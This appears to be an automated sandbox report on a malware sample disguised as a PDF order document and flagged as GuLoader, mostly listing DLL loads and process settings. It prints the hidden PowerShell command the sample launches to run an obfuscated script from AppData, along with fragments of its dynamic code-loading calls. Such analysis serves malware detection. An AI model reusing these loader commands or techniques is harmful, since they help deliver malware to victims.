Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Order requirements CIF Greece_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2047558142.0000000008AB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2048865185.0000000009EB9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Hamule $Organicism $provicariate), (Exceedingly @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fanemarch = [AppDomain]::CurrentDomain.GetAssemblies()$glob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($fraternation)), $Reguleringsordningers).DefineDynamicModule($Topklasser, $false).DefineType($Gader, $Agiel, [System.MulticastDelegate]

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04FDCA85 push eax; mov dword ptr [esp], edx	1_2_04FDCA8C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_04220C66 push eax; retf	6_2_04220C70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_04224E40 push ebx; ret	6_2_04224E52
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_04222E87 pushad ; ret	6_2_04222E88
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_04225902 push B417840Ah; retf	6_2_04225907
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0422094F push ss; retf	6_2_04220958
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_042217B2 push ebp; retf	6_2_042217B3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_04222FF1 push esi; ret	6_2_0422300A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_042249CF push ebx; ret	6_2_042249D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F7891E pushad ; iretd	6_2_20F7891F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F73AA1 push eax; ret	6_2_20F73CA5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F78C2F pushfd ; iretd	6_2_20F78C30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F78DDF push esp; iretd	6_2_20F78DE0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
